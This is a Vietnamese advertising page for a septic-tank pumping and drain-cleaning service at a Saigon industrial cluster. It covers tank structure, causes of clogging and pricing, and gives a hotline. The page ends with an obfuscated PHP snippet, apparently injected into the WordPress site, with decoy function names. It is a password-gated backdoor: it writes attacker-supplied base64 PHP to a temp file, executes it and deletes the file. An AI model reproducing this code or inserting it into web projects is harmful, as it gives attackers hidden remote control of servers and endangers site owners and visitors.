Dịch vụ hút hầm cầu tại cụm CN tổng công ty Nông Nghiệp Sài Gòn

Hoạt động trong mảng vệ sinh môi trường từ năm 2010 đến nay, hutbephot-urenco tự tin là đơn vị uy tín hàng đầu ở trên địa bàn. Chuyên cung cấp dịch vụ hút hầm cầu tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn không đục phá và không gây ra mùi hôi khó chịu cho môi trường xung quanh. Đồng thời có cung cấp đủ giấy tờ, hợp đồng theo yêu cầu. Chắc chắn sẽ mang lại trải nghiệm tuyệt vời và hài lòng nhất có thể cho tất cả khách hàng.

Đôi nét về thông cống nghẹt Sài Gòn – cụm công nghiệp 

Tương tự tình trạng hầm cầu sau một quá trình dài sử dụng, thông cống nghẹt Sài Gòn cụm công nghiệp, khu công nghiệp hay gặp tình trạng tắc nghẽn xuất phát từ nhiều nguyên nhân khác nhau. Theo đó mối bận tâm lớn nhất của các chủ doanh nghiệp đó là đâu là địa chỉ uy tín và giá thông tắc hầm cầu bao nhiêu tiền một khối vì số lượng thông hút tại đây là không hề nhỏ.

Hầm cầu cụm công nghiệp có cấu tạo, nguyên lý tương tự hầm cầu gia đình

Cấu tạo hầm cầu tại cụm CN

Hầm cầu sẽ bao gồm có 1 ngăn chứa, 1 ngăn lắng và 1 ngăn lọc. Riêng hầm cầu tự hủy 2 ngăn sẽ có ngăn lắng và ngăn chứa. Chức năng, nhiệm vụ cụ thể như sau:

 • Ngăn chứa: Chiếm diện tích lớn nhất trong bể, sẽ chứa chất thải từ bồn cầu đi xuống. Tại đây chất thải của mọi người sẽ biến đổi trong môi trường kỵ khí nhờ vào những vi sinh vật ở trong bể.
 • Ngăn lắng: Các chất không phân hủy được giữ lại và chỉ có nước đi ra ngoài

Nguyên lý hoạt động của hầm cầu tại các cụm CN

Chất thải nhờ dòng chảy sẽ được đưa xuống ngăn bể chứa tự hoại. Ở đây chất rắn lắng xuống bể, phân hủy thành bùn. Khi mà chất thải được phân hủy sẽ đưa sang ngăn lắng để lọc. Khi đã lọc bỏ hết các tạp chất thì nước được lọc sẽ thải ra hố gas, ra cống.

Nguyên nhân khiến hầm cầu cụm CN bị tắc nghẽn

Nguyên nhân phổ biến làm cho hầm cầu cụm CN bị tắc nghẽn thường là do quá trình sản xuất thải ra rác thải mới, nhất là chất thải chứa nhiều chất độc hại. Trường hợp để lâu ngày thì chúng sẽ kết dính với nhau gây ra tắc nghẽn đường cống, hầm cầu. Ngoài ra còn do sự chủ quan của các doanh nghiệp, lâu ngày không triển khai thông hút định kỳ khiến hầm cầu hay đường ống thông chất thải đầy.

Qua đó làm ảnh hưởng lớn đến môi trường làm việc của các công nhân, chậm quá trình sản xuất. Đôi khi tắc nghẹt nước mưa còn tràn vào hầm cầu làm chất thải trên lên xưởng gây ra tác động không nhỏ cho máy móc và quá trình làm việc cũng bị gián đoạn theo.

Nguyên nhân khiến hầm cầu cụm CN bị tắc nghẽn

Thông tắc hầm cầu cụm công nghiệp giá bao nhiêu?

Nhìn chung việc quyết định giá thành hoạt động hút hầm cầu tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn hay bất kỳ cụm CN nào khác cao hay thấp sẽ phụ thuộc vào khối lượng thông hút. Do vậy để có được mức giá ưu đãi thì tốt nhất hãy tìm kiếm cho mình địa chỉ nhận thông hút uy tín và chất lượng để tham khảo.

Họ sẽ tiến hành khảo sát và tùy theo khối lượng chất thải sẽ đưa ra cho bạn câu trả lời hợp lý nhất về giá thành. Cũng giống hầm cầu hộ gia đình, hầm cầu tại cụm CN cũng có kết cấu và nguyên lý hoạt động như nhau, chỉ khác một điều là khối lượng chất thải lớn hơn thôi.

Dịch vụ hút hầm cầu tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn

Là một đơn vị chuyên nhận thông tắc hầm cầu tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn uy tín, có nhiều năm kinh nghiệm nên hutbephot-urenco chính là một trong những địa chỉ có giá thành thông hút giá rẻ tại TP. Hồ Chí Minh. Ngoài ra đây còn là đơn vị uy tín, chất lượng với đội ngũ nhân viên dày dặn kinh nghiệm, trình độ cao nên chắc chắn mang đến cho khách hàng dịch vụ ưng ý nhất.

Ngoài thông tắc hầm cầu thì công ty còn cung cấp các dịch vụ như:

 • Nhận thông tắc đường ống nước thải ở nhà ăn tắc nghẽn lâu ngày do dầu mỡ bám bằng máy thông lò xo hiện đại.
 • Nạo vét cống, hố ga, thông tắc nhà vệ sinh, bồn cầu, thay rửa bể nước cống ngầm
 • Kinh doanh và vận chuyển bùn vi sinh, xử lý bùn vi sinh
 • Nhận vận chuyển nước thải công nghiệp, nước thải nguy hại về nhà máy xử lý,…
Hutbephot-urenco vệ sinh hầm cầu tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn

Hutbephot-urenco cam kết mang đến hiệu quả và giá thành tốt nhất

 • Công ty có đội ngũ nhân viên trình độ cao, nhiệt tình, tay nghề cứng nên luôn được khách hàng đánh giá tốt và phản hồi tích cực
 • Sở hữu nhiều xe thông hút chuyên dụng, hút được khối lượng từ ít đến nhiều nên trong quá trình thi công không làm vương vãi hay ảnh hưởng đến môi trường khu vực xung quanh.
 • Đơn vị đang đứng đầu về mảng thông tắc hầm cầu với đội ngũ nhân viên chịu khó, không quản ngại khó khăn, nắng mưa để hoàn thành mọi vấn đề được giao, cam kết bàn giao đúng hạn.
 • Hutbephot-urenco cam kết về dịch vụ cung cấp với chi phí hợp lý, công khai và đưa ra mức bảo hành dài hạn.
 • Chúng tôi có giấy phép kinh doanh và hồ sơ năng lực đầy đủ khi khách hàng yêu cầu. Đồng thời cam kết hút đúng, hút đủ và vận chuyển đúng khối lượng thực tế.

Video: Review máy thông tắc cống

Video dưới đây sẽ review cho bạn máy thông tắc cống.

Tự hào là một đơn vị uy tín trong mảng vệ sinh môi trường nên Hutbephot-urenco chắc chắn là lựa chọn hàng đầu dành cho khách hàng là chủ doanh nghiệp tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn. Do vậy nếu bạn có nhu cầu cần hút hầm cầu tại cụm CN Tổng Công ty Nông Nghiệp Sài Gòn thì hãy liên hệ với chúng tôi qua số hotline 0986 594 594 nhé!

Nguyễn Ngọc Hải

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Gọi Ngay

Contact Me on Zalo
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}